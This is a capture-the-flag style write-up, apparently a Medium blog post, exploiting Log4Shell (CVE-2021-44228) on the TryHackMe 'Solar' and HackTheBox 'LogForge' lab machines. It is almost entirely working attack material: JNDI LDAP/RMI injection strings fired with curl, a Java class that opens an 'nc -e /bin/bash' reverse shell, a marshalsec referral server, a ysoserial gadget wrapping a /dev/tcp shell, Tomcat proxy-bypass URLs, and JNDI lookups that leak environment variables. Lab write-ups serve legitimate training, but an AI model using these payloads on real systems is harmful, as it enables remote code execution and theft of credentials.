Exploiting log4jshell(CVE-2021–44228)- solar(THM) and logforge(HTB)

THM- solar

https://tryhackme.com/room/solar

TASK 2(Reconnaissance)

nmap -Pn -sS -p- -T4 -vvv --script discovery -sV --version-all -sC -O --max-retries 2 -oN discovery_10.10.171.12.out 10.10.171.12autorecon -vvv 10.10.171.12

TASK 3(Discovery)

Accessing the web server via browser. We get a ton of information regarding the tool/software running.

TASK 4 and 5(POC, Exploitation)

If we try the log4jshell POC payload in the path(/admin/cores) which we have seen in the log file, we see that we are getting the connect back.

${jndi:ldap://ATTACKERCONTROLLEDHOST}
nc -lnvp 9999curl 'http://10.10.114.97:8983/solr/admin/cores?foo=$\{jndi:ldap://10.17.7.105:9999\}'curl 'http://10.10.114.97:8983/solr/admin/cores?foo=$\{jndi:rmi://10.17.7.105:9999/lollz\}'
update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_311/bin/java" 1
update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_311/bin/javac" 1
update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_311/bin/javaws" 1
update-alternatives --set java /usr/lib/jvm/jdk1.8.0_311/bin/java
update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_311/bin/javac
update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_311/bin/javaws
java -version
apt install mavenmvn clean package -DskipTests 
# This will Compile the java app @ https://github.com/mbechler/marshalsec
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.17.7.105:8000/#Exploit"
public class Exploit {
static {
try {
java.lang.Runtime.getRuntime().exec("nc -e /bin/bash 10.17.7.105 9999");
} catch (Exception e) {
e.printStackTrace();
}
}
}
javac Exploit.java -source 8 -target 8
curl 'http://10.10.156.44:8983/solr/admin/cores?foo=$\{jndi:ldap://10.17.7.105:1389/Exploit\}'

HTB- logforge

Apache reverse proxy bypass:

http://10.10.11.138/portal/..;/manager/html/expire?path=/
or
http://10.10.11.138/;name=lollz/manager/html/upload
java -jar ysoserial-modified.jar CommonsCollections5 bash 'sh -i >& /dev/tcp/10.10.14.40/53 0>&1' > /mnt/Ethical_Hacking/Box/APNA/Everything/Ethical_Hacking/Practice_LABS/hackthebox/Machines/LogForge-10.10.11.138/cc5.ser
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.40:1389 -P /mnt/Ethical_Hacking/Box/APNA/Everything/Ethical_Hacking/Practice_LABS/hackthebox/Machines/LogForge-10.10.11.138/cc5.ser
ldap://10.10.14.40:1389/a8ziqy
${jndi:ldap://10.10.14.40:1389/a8ziqy}
${jndi:ldap://<IP>:<PORT>/${env:<var_name>}}${jndi:ldap://10.10.14.40:1389/${env:ftp_user}}
${jndi:ldap://10.10.14.40:1389/${java:version}}
${jndi:ldap://10.10.14.40:1389/${java:os}}

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
n00🔑

n00🔑

Computer Security Enthusiast. Tries to understand how computers work. Would love to hear your suggestions and feedback. https://www.linkedin.com/in/pswalia2u/